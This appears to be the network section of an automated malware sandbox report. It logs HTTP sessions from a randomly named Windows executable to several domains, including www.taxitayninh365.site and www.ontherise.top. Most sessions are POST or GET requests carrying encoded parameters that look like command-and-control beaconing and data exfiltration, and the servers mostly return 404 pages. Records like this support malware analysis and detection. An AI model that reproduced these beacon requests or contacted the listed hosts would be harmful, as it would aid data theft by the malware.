                                                                Data Ascii: 9rKHjDxP=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBVMGV/REONeNR5fFxMwk8V2Kje7LKIaM3iNEpsb6I/08hE4qE4dA0lGzJsZy6YFlD9FtWA0nOX2EOf8YZUnIIYGNsEvOAF9okv6tqLG0TkBab0oBJ0Gx2KmUW6Fn2AFZuDByn6jV37L/MkKLwjd0ztxTym+pcDc2BLHWLPue6MhzpHzvmdmPbOJ6zPx6NWvIh6Yc3O+oYejS98x1SOcrTIMsJ8DKl25iESeW1IFLAcbNNeazuxYNEB2oJti0EDM3Yq99W5jAVyISAytywwb0SepV+Bm3OpkulB5QOPB+3gJnS7EC5T7XUQhLxDvriG1zaNSHQFvsjGWf53xXr4THaljPpp+CaVPSLIW6ln6SSeP9THxfzTyQmZLzUHoJXvTdnx07UOlTULRdoO2W5l1brKfYxP+YuUJAL3hDPioUSYPHbJOGEdzt+yp2j+5vH6VSwmPywlUhoNRh0znsCcoK0Ez+esk9cNBZyOfSLzcvyHSXBKp5tgor4GZNtLCGiOAt/VCC623K8VyyYqMn6dbiWlYM0wLpfaf9VThj+L8lTUrqkQgSpD3fkzuFpl7pyOtnDpSIvKq85moqBMj5XNlKOj/tI+jLpb4hVg525VS36tHWnmPDmoJA6icQx1mcmKoKFZk0umIAOIVpcsTZUGL1mSmZ7MhIn5MkApfY1tWZIvup5JH+bXapHq5vujkifdNcHWOogz3w1fKv2bFQbqfL61dNzvIjN+pqrKhdg1NlhO4s1a5LQOYQ3o1aGbLTuUMAXBQEGPvpIGD+Xy2iQ+RA45EgYF9qjFPuRLdo5V06gjfyWNhhK9ZNU+6pyQ23xbXvX/EopSd7iD/LMfb+VRbIBG6cdexoHZYfBoKYCsTCc5KeluLtfZpfPVAGc0vxeiogtC5AyBxaLGQQTAApBNwCfCf6IImSSio3MPRVZBb2uPk4zL+O+W+G3LQfCCPQfuZIbl/ [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.74998723.167.152.41804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:00.974229097 CET492OUTGET /q34f/?9rKHjDxP=dUs1zx3MtgRbplDUvpUvYjuAQD0vmGuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9erFxSPIl4knKdLfgwmO1oEe1lTFw6B1+2EJs+fQO6G9vPzlr5NjlOo8Ha&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.749988103.75.185.22804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:08.760087013 CET775OUTPOST /syud/ HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.taxitayninh365.site
                                                                Referer: http://www.taxitayninh365.site/syud/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 48 4e 51 36 59 78 4f 30 6e 46 67 36 6a 38 79 2b 63 69 6f 73 35 61 71 54 4f 2f 6c 5a 46 57 43 52 34 78 6a 30 55 77 35 51 73 4d 4a 4d 76 45 34 35 70 44 31 58 59 79 7a 79 30 64 5a 73 52 43 4f 76 5a 57 6a 61 4f 6b 46 32 4a 58 66 71 76 41 47 32 48 77 4b 75 6b 69 52 47 50 56 6b 4a 59 5a 41 58 66 51 52 4a 66 46 70 31 38 4b 45 7a 44 48 6e 46 52 42 54 63 5a 42 48 6b 65 56 32 2b 71 39 70 79 51 6b 45 47 37 35 67 52 78 61 72 38 64 79 6e 39 7a 77 61 4a 56 55 34 69 59 4f 4c 59 63 41 6c 30 64 73 79 2f 6e 42 78 61 6d 41 6f 6f 71 35 53 45 55 68 75 48 74 32 46 46 34 61 2f 77 59 71 39 46 35 51 6e 52 78 77 3d 3d
                                                                Data Ascii: 9rKHjDxP=tyMI7ugAvLpMHNQ6YxO0nFg6j8y+cios5aqTO/lZFWCR4xj0Uw5QsMJMvE45pD1XYyzy0dZsRCOvZWjaOkF2JXfqvAG2HwKukiRGPVkJYZAXfQRJfFp18KEzDHnFRBTcZBHkeV2+q9pyQkEG75gRxar8dyn9zwaJVU4iYOLYcAl0dsy/nBxamAooq5SEUhuHt2FF4a/wYq9F5QnRxw==
                                                                Dec 11, 2024 15:05:10.314253092 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:10 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                Dec 11, 2024 15:05:10.314271927 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.749989103.75.185.22804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:11.419085979 CET795OUTPOST /syud/ HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.taxitayninh365.site
                                                                Referer: http://www.taxitayninh365.site/syud/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 64 73 67 36 65 53 57 30 68 6c 67 39 39 4d 79 2b 56 43 6f 33 35 61 75 54 4f 37 39 4a 47 6b 57 52 37 51 54 30 54 78 35 51 72 4d 4a 4d 33 55 34 38 6e 6a 30 5a 59 79 75 59 30 63 31 73 52 47 6d 76 5a 55 72 61 4f 33 74 33 4b 6e 66 73 36 51 47 4f 61 67 4b 75 6b 69 52 47 50 57 59 6a 59 64 73 58 66 43 46 4a 51 45 70 32 30 71 45 77 4b 6e 6e 46 56 42 54 59 5a 42 48 53 65 51 57 59 71 2f 68 79 51 68 67 47 37 73 41 65 34 61 72 32 51 53 6d 50 2b 56 6e 73 62 30 30 2b 57 4f 2f 78 45 48 6c 6a 56 36 7a 64 39 6a 39 32 34 52 51 54 75 37 32 79 44 48 7a 79 76 33 42 64 31 34 4c 52 48 64 59 76 30 43 47 56 6e 4a 2f 32 47 73 4c 72 4f 4c 62 6b 63 64 50 51 75 66 63 34 35 68 51 3d
                                                                Data Ascii: 9rKHjDxP=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkWR7QT0Tx5QrMJM3U48nj0ZYyuY0c1sRGmvZUraO3t3Knfs6QGOagKukiRGPWYjYdsXfCFJQEp20qEwKnnFVBTYZBHSeQWYq/hyQhgG7sAe4ar2QSmP+Vnsb00+WO/xEHljV6zd9j924RQTu72yDHzyv3Bd14LRHdYv0CGVnJ/2GsLrOLbkcdPQufc45hQ=
                                                                Dec 11, 2024 15:05:12.978686094 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:12 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                Dec 11, 2024 15:05:12.978710890 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.749990103.75.185.22804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:14.074532986 CET1808OUTPOST /syud/ HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.taxitayninh365.site
                                                                Referer: http://www.taxitayninh365.site/syud/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 64 73 67 36 65 53 57 30 68 6c 67 39 39 4d 79 2b 56 43 6f 33 35 61 75 54 4f 37 39 4a 47 6b 4f 52 37 69 72 30 56 54 52 51 71 4d 4a 4d 70 45 34 39 6e 6a 30 55 59 79 6d 63 30 63 70 53 52 45 75 76 57 52 6e 61 61 57 74 33 52 33 66 73 6c 67 47 31 48 77 4c 73 6b 6a 39 4b 50 56 67 6a 59 64 73 58 66 43 70 4a 5a 31 70 32 35 4b 45 7a 44 48 6e 5a 52 42 54 67 5a 42 66 43 65 51 61 75 72 4c 56 79 51 42 77 47 33 2f 6f 65 33 61 72 77 56 53 6d 58 2b 56 6a 2f 62 31 59 59 57 4f 37 66 45 41 52 6a 45 4f 4f 68 6d 42 39 4c 69 67 45 2b 74 62 4c 65 56 47 66 78 72 78 5a 46 30 4b 6e 4c 43 64 30 4a 39 42 4c 63 75 38 4f 68 51 4f 33 41 4b 66 7a 42 62 36 53 33 30 74 6f 72 36 30 75 73 37 6c 31 67 6e 76 6f 6e 67 68 6f 42 71 4b 6b 74 65 5a 38 79 2f 62 58 73 49 6e 71 48 48 68 58 4f 79 50 68 30 4d 69 57 4f 71 30 45 67 4d 2b 61 2f 79 6e 5a 6e 62 6f 6e 52 7a 4c 39 36 77 31 74 66 4e 47 45 4e 4d 65 32 62 4a 38 6d 47 48 5a 35 59 48 4e 77 4f 51 69 45 61 67 64 71 56 2f 5a 46 31 71 [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkOR7ir0VTRQqMJMpE49nj0UYymc0cpSREuvWRnaaWt3R3fslgG1HwLskj9KPVgjYdsXfCpJZ1p25KEzDHnZRBTgZBfCeQaurLVyQBwG3/oe3arwVSmX+Vj/b1YYWO7fEARjEOOhmB9LigE+tbLeVGfxrxZF0KnLCd0J9BLcu8OhQO3AKfzBb6S30tor60us7l1gnvonghoBqKkteZ8y/bXsInqHHhXOyPh0MiWOq0EgM+a/ynZnbonRzL96w1tfNGENMe2bJ8mGHZ5YHNwOQiEagdqV/ZF1qwjozpocJvVzKhiNkoe+g3gqB6upCsUrI5zhbJYp+flVR04ucl9TbaHILDTQt6F/3yAIFmcM10AxwWoLMkxeVJ2XbJ186kX0mC5//JtsnvDlODZPFFO+9GxZqUl2rTuM1VDod0xvxsavFBf0JiE/t9HjNoW+pvo+1Uz5atV6XW6JdUZFutSdlC8WdSpC62+sx4IajFADWAApw9fBDfn/E+pgv+NWBm9ujVxpCiU6GDmg7vrgLRS/Fwo3j1lIMqc9V9FtK/owPl4qn8o/AmPUho9CVqXoYrLgnZviTul5q8tEtFxMTW9Th5e2nKPuFSfuQllzZ28GKcp7TWU0BKgkHK0TU2wsSg1yeg2OYmUHURD1BC1UmapUmUbEUYWFJ8A8lAdbT//zH1HPAqIegzLvG6GBPuhAweM0XM1chVyDV4oD6t5nNk2mIvPq7XvXiqV4+uMkn5IOG/W+PBDqsXFGYCFB6BTILP0OrPcWAO2pePd8VX4ZxbEknA6lD9nAAEZN/OBSPgtqncYhBWChvvWc4XCSxcf9JXQ5OIUEPKEVi72HzHO+AF3kqFJsvNsVpjyEvqyTawwvzjU+DaNwMIJud5SJqdqeoK+3hEvZvJlUkiHl2jUrL925U4s/opR513A89+8RoZireZ67t4hasYrLewbaqeK1bq9O/YG [TRUNCATED]
                                                                Dec 11, 2024 15:05:15.634196997 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:15 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                Dec 11, 2024 15:05:15.634242058 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.749991103.75.185.22804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:16.748859882 CET501OUTGET /syud/?9rKHjDxP=gwko4eFZldhJcfMpXUu8nEIrrsK3aSdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVZSHwmSCiW0eRqUFBT2gRXL1+O05pXEJ5/rwABmaKZBakYxfHeQS7sPZ1&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:05:18.320144892 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:18 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                Dec 11, 2024 15:05:18.320209980 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.749992162.0.213.94804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:23.873699903 CET757OUTPOST /wr6c/ HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.ontherise.top
                                                                Referer: http://www.ontherise.top/wr6c/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 34 62 41 47 6c 7a 41 49 72 36 63 2f 76 2f 47 66 78 49 78 31 74 6a 49 5a 4c 68 63 44 72 5a 30 46 57 49 36 79 5a 6e 4b 77 43 47 4f 72 6c 50 43 42 79 6b 31 65 31 72 54 35 52 45 41 49 75 57 67 65 54 47 76 58 63 73 37 5a 70 61 4d 52 77 55 65 6f 31 66 59 47 4e 46 52 66 44 42 53 68 55 59 53 4f 75 2f 35 65 5a 6e 70 75 49 44 69 70 6f 47 33 56 48 7a 4a 54 46 50 37 65 64 69 73 68 31 65 51 78 2b 78 6b 57 47 61 43 56 51 2f 6a 53 6c 47 61 62 61 79 34 6c 73 79 66 30 30 31 59 49 50 4c 52 42 61 4f 48 61 51 73 51 55 55 78 78 62 6b 57 4a 6b 66 59 5a 46 4a 41 62 6e 5a 77 59 52 64 38 5a 4b 48 5a 47 32 32 67 3d 3d
